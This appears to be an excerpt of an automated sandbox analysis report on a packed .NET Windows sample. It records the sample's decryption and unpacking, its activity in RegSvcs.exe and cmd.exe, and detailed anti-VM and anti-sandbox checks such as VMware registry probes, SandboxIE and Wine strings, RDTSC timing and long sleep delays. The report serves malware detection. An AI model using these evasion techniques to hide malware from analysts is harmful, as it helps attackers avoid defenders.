          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeMutant created: \Sessions\1\BaseNamedObjects\kSLmFPbu
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4116:120:WilError_01
          Source: TPJX2QwEdXs5sTV.exe, u0003u2001.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 1.2.TPJX2QwEdXs5sTV.exe.cd0000.0.unpack, u0003u2001.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 1.0.TPJX2QwEdXs5sTV.exe.cd0000.0.unpack, u0003u2001.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: RegSvcs.pdb, source: cmd.exe, 00000017.00000002.521600812.0000000003AB7000.00000004.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.390723041.000000000105F000.00000040.00000001.sdmp, cmd.exe, 00000017.00000002.518459422.000000000369F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: RegSvcs.exe, 00000006.00000002.391607663.0000000002EB0000.00000040.00020000.sdmp, cmd.exe, 00000017.00000002.511566191.0000000000870000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, cmd.exe
          Source: Binary string: RegSvcs.pdb source: cmd.exe, 00000017.00000002.521600812.0000000003AB7000.00000004.00020000.sdmp
          Source: Binary string: cmd.pdb source: RegSvcs.exe, 00000006.00000002.391607663.0000000002EB0000.00000040.00020000.sdmp, cmd.exe

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: TPJX2QwEdXs5sTV.exe, u0003u2001.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.TPJX2QwEdXs5sTV.exe.cd0000.0.unpack, u0003u2001.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.TPJX2QwEdXs5sTV.exe.cd0000.0.unpack, u0003u2001.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041B86C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041B802 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041B80B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041C292 push AD92C3EFh; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0040C335 pushfd ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041CDE0 push F8C82648h; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041B6B3 push esp; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041B7B5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FBD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_008876BD push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_008876D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035FD0D1 push ecx; ret
          Source: initial sample | Static PE information: section name: .text entropy: 7.79647412085
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: TPJX2QwEdXs5sTV.exe PID: 5056, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 0000000002D985F4 second address: 0000000002D985FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 0000000002D9897E second address: 0000000002D98984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe TID: 4452 | Thread sleep time: -35576s >= -30000s
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe TID: 3104 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0087B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_008868BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0088245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_008931DC FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_008785EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Thread delayed: delay time: 35576
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000008.00000000.314540524.0000000008A32000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000008.00000000.314540524.0000000008A32000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000008.00000000.295449841.0000000008CEA000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq%%
          Source: explorer.exe, 00000008.00000000.339578610.0000000008B4E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 00000008.00000000.339578610.0000000008B4E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000008.00000000.368949944.00000000048E0000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.339578610.0000000008B4E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000008.00000000.294727832.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmp | Binary or memory string: VMWARE
          Source: explorer.exe, 00000008.00000000.294727832.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000008.00000000.309101909.00000000069DA000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD002
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00892258 IsDebuggerPresent,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00886C9A GetProcessHeap,RtlFreeHeap,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exe | Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FFB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F9F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F69080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01034015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01034015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01022073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01031074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F8C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F9A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F84120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0102131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F9FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01038B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0101D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0102138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01035BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0101B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0101B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01038A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F6DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F6F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F6DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01038D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F8746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01018DF1 mov eax, dword ptr fs:[00000030h]
